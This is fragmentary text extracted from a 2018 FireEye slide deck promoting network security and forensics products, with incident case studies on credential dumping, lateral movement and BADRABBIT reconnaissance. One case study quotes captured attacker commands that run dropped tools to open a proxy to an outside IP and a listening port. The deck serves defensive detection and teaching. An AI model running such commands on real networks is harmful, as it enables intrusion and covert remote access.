Defending Against Evolving Network Security Threats - FireEye...©2018 FireEye Network Security Today Sophisticated Hiding in plain sight Credential reuse Rapid evasion creation Persistent

Defending Against Evolving Network Security Threats

©2018 FireEye

Network Security Today

Sophisticated

Hiding in plain sightCredential reuse Rapid evasion creation

Persistent

TargetedInnovativeCustomized

Professional

DeterminedOrganizedWell Funded

2

101 DaysAverage days before a breach was detected*

$3.62MAverage cost of a

breach**

©2018 FireEye

Lack of resources to quickly and effectively

address threats

Lack of visibility into traffic as networks

expand

Driving the need to reduce dwell time and limit exposure

3

Compounding FactorsThreat Actors aren’t the Only Challenge

©2018 FireEye

New Developments in Network Security

4

Network Security (NX 6500) & Smart Grid (VX 12550)

File & Content Security (FX 6500)

Network Forensics (PX/IA)

SmartVision

©2018 FireEye

DC DMZ

Router

NG Firewall

Switch

Engineering HR Marketing

PrivatePublic

Web DNS App EmailFile File File App

File ContentSecurity (FX)

SmartVision

Email Security

Endpoint Security

MobileCentral Management IA

PX

Endpoint Security

Network Security Topology

Network Security (NX)

vNX

©2018 FireEye

New Developments in Network Security (NX & FX)“Five Styles of Advanced Threat Defense Framework”

6

PayloadAnalysis

§ Style 3 – Payload Analysis (aka Sandboxing)

– NX/FX

§ Style 2 – Network Forensics

– PX/IA

§ Style 1 – Network Traffic Analysis (NTA)

– SmartVision

©2018 FireEye

Network Security 5th Generation Portfolio

!

NX 6500

!

NX 5500

NX 4500

NX 4400

NX 3500

NX 2500

PWR

NX 1500

NX 2550 !

VX 12550

VX 5500 MVX Smart Grid

Cloud MVXGREATER STORAGEWith 2x storage to hold more metadata and alerts

GREATER VALUENew 5th generation appliance set a new standard for price/performance, SSL Intercept

GREATER PORT DENSITYTwice the port density provides greater flexibility and scalability as networks grow

NEW10Gbps

ADVANCED DETECTIONML modules for Exfil detection, SSL beaconing and fingerprinting, MalwareGuard analysis

©2018 FireEye

Malware that Targets Files and Content

Data Center

• Detect and block malware in file shares and content stores

• Detects advanced malware that bypasses AV

• Optimized for SharePoint and OneDrive

Infected File

End Users File Share/Data Store

File Protect FX 6500

©2018 FireEye

New Developments in Network Forensics

9

“Five Styles of Advanced Threat Defense Framework”


– NX/FX


– PX/IA


– SmartVision

NetworkForensics

©2018 FireEye

FireEye Network Forensics – A Complete Solution

10

◆ Packet capture (PX) – a “security camera” to record and replay network traffic and flows

▶ What happened?

▶ What was involved?

▶ What was taken?

◆ Investigation Analysis (IA) – a source to manage multiple “security cameras”

◆ A tool that correlates events and asks questions:

“How many times in the last three months did this guy….. with the red hat and the dark beard….. appear on any of our cameras….. while carrying a brown briefcase?”

©2018 FireEye

11

Detect a broad array of security incidents, improve the quality of your response and precisely quantify the impact of each incident

High-PerformancePacket Capture

That Grows withYour Network

High-Fidelity Data Analysis

THREAT HUNTINGPerform retrospective threat hunting and analysis

EXTENSIVE VISIBILITYSession decoder support for a myriad of protocols & file types

FLEXIBLE PLATFORMScales to meet distributed and large enterprise needs;Subscription pricing and expandable storage licenses

HIGH-PERFORMANCERecord speeds of up to 20Gbps

LOSSLESS PACKET CAPTUREVital to effective network forensic investigations

INTELLIGENT CAPTURESelective packet filtering for maximum efficiency

ULTRAFAST SEARCHLeverage unique indexing architecture for fast answers

EASY DRILL DOWN Quickly respond to alerts that matter

INTEGRATED INTELAdd rich context to IOC and alerts

©2018 FireEye

New Developments – SmartVision “Five Styles of Advanced Threat Defense Framework”

12

NetworkTraffic Analysis


– NX/FX


– PX/IA


– SmartVision

©2018 FireEye

Anatomy of the Attack Life Cycle

Initial Recon

Establish Foothold

Escalate Privileges

Complete Mission

Initial Compromise

Internal Recon

Maintain Presence

Move Laterally

Maintain Presence

Use of persistence mechanisms, such as Volume Boot Record (VBR) modification

File and objects moved over Windows SMB protocols

Unusual file transfer activity from ADMIN

Network mappingHost & Service EnumerationUser Hunting

Installation of fileless malwaresuch as Mimikatz

Malware Download C&C

SmartVision – Demonstration

©2018 FireEye

Why SmartVision

17

◆ Born from real-world investigation monitoring◆ Attackers consistently find ways around existing security controls◆ Once inside, attackers must leverage existing environment to access systems◆ Lack of investment by attackers in novel lateral movement◆ Well-defined protocols used differently by attackers and administrators

©2018 FireEye

Data Center

Router

Firewall

Switch

Engineering HR Marketing

File App Email

Remote Office

Enterprise Network Architecture with SmartVision

SmartVisionDNS

NX

SmartVision SmartVision

SmartVision

PCI Network SCADA Network

SmartVision

©2018 FireEye

SmartVision Internals

19

◆ Monitor internals protocols for base events:▶ SMB, SMB2, DCERPC, WinRM◆ Record protocol metadata for triage review:▶ DNS, HTTP, TLS, RTSP, SIP, SSH, SMTP, POP3, RDP, SMB, SMB2, DCERPC, IRC◆ Correlate individual, “base” events as they occur◆ Some “base” events are definitively evil◆ Other “base” events require correlation

©2018 FireEye

SmartVision Example Correlation

20

◆ Remote Service Created and Started

ROpenSCManagerWCreateServiceW

RStartServiceW

RCreateServiceWOW64WOR

RDeleteService

Optionally

©2018 FireEye

Case Study 1: Credential Dumping

21

◆ Mandiant responds to an Incident Response◆ Active attacker targeting a consulting firm◆ Attacker is attempting to access data concerning consulting firm’s clients◆ Mandiant deploys SmartVision sensors to critical network segments

©2018 FireEye


22

©2018 FireEye


23

◆ Base events are visible for each high-level alert◆ Base events contain their own metadata, which is available for analysis

©2018 FireEye


24

©2018 FireEye


25

©2018 FireEye


26

©2018 FireEye


27

©2018 FireEye

Case Study 2: Lateral Movement

28

◆ IT provider. Initial intrusion happened before start of “Proof-of-Concept”◆ Attacker using VPN to access the environment. No backdoors.◆ SmartVision recorded lateral movement and remote command execution on systems

©2018 FireEye


29

◆ IT provider. Initial intrusion happened before start of “Proof-of-Concept”◆ Attacker using VPN to access the environment. No backdoors.◆ SmartVision recorded lateral movement and remote command execution on systems

PIPE\??\\AD-SERVER-IP-REDACTED cmd /c "start c:\windows\temp\sk.exe -proxy CHINESE-IP-REDACTED 443 8099")?SMB? ??0?,?????#?SMBq? ??0?,Z?SMBu???0-?/\\ AD-SERVER-IP -REDACTED\IPC$?????b?SMB?? \0@-????0mt???,?l?@E;?SMB.? ??0?-????????>?SMB%? \0.?T?T&??\PIPE\??\\ AD-SERVER-IP-REDACTED??CCcmd /c "start c:\windows\temp\p.exe -s 8087 -dir c:\win

©2018 FireEye


30

©2018 FireEye

Case Study 3: Reconnaissance + Remote Execution

31

◆ Car Manufacturer◆ BADRABBIT ransomware deployed to select systems◆ Reconnaissance activity on servers during ransomware attack

©2018 FireEye


32

©2018 FireEye


33

©2018 FireEye


34

©2018 FireEye

SmartVision Roadmap

35

◆ More correlation rules◆ More protocols supported◆ Unsupervised Machine Learning◆ User-interface improvements for quick

alert triage

Thank You

OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.

Practical ExperienceBest Practice GuidanceBrian Barnett, CEO Luz Technologies

Who We Are?

•••

Common Challenges to Our Methods

••••

Things We’ve Actually Heard

Things We’ve Actually Heard

The Importance of Perimeter Complexity

What We Look For

How We Leverage NX Technology

Best Practice Guidance

The Inside Threat••••

Eggs In One Basket••

•••

Kinetic vs Persistent

•••

•••

OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.

Thank YouBrian Barnett, CEO Luz Technologies

Defending Against Evolving Network Security Threats - FireEye...©2018 FireEye Network Security Today Sophisticated Hiding in plain sight Credential reuse Rapid evasion creation Persistent

Documents